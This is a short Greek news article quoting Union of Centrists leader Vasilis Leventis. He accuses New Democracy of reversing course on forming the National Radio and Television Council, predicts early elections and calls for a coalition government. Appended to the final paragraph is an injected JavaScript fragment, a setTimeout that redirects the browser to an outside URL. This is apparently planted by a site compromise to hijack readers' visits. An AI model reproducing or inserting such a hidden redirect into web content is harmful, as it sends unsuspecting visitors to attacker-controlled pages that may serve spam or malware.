Λεβέντης: Η ΝΔ έκανε «τούμπα» με το ΕΣΡ – Εμείς μείναμε σταθεροί

0
6

 

«Η ΝΔ μετακινήθηκε και έκανε «τούμπα», εμείς μείναμε σταθεροί» δήλωσε ο πρόεδρος της Ένωσης Κεντρώων Βασίλης Λεβέντης μιλώντας στην τηλεόραση του ΣKAI και αναφερόμενος στη σύσταση του ΕΣΡ.

Ο πρόεδρος της Ένωσης Κεντρώων σημείωσε χαρακτηριστικά: «Εμείς από την πρώτη στιγμή μιλήσαμε και ταχθήκαμε με τη συνεννόηση και τη συναίνεση όσον αφορά τη σύνθεση του νέου ΕΣΡ. Απαιτούσαμε την κατάργηση του νόμου ως πρώτο θετικό βήμα της κυβέρνησης. Αυτό έγινε με διαβεβαίωση προφορική του προέδρου της Βουλής».

Αναφερόμενος στις πολιτικές εξελίξεις ο Βασίλης Λεβέντης υποστήριξε ότι θα γίνουν πρόωρες εκλογές και εξήγησε ότι «oι εκλογές θα προκύψουν από την οικονομική αποτυχία της κυβέρνησης».

Επανέλαβε δε τη θέση του κόμματός του για οικουμενική κυβέρνηση:«Εμείς πιστεύουμε στην κυβέρνηση συνεργασίας γιατί έτσι μόνο, η χώρα μας θα φύγει από τα μνημόνια. Οι αυτοδύναμες κυβερνήσεις πτώχευσαν την χώρα και οι πολίτες το ξέρουν πολύ καλά αυτό». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here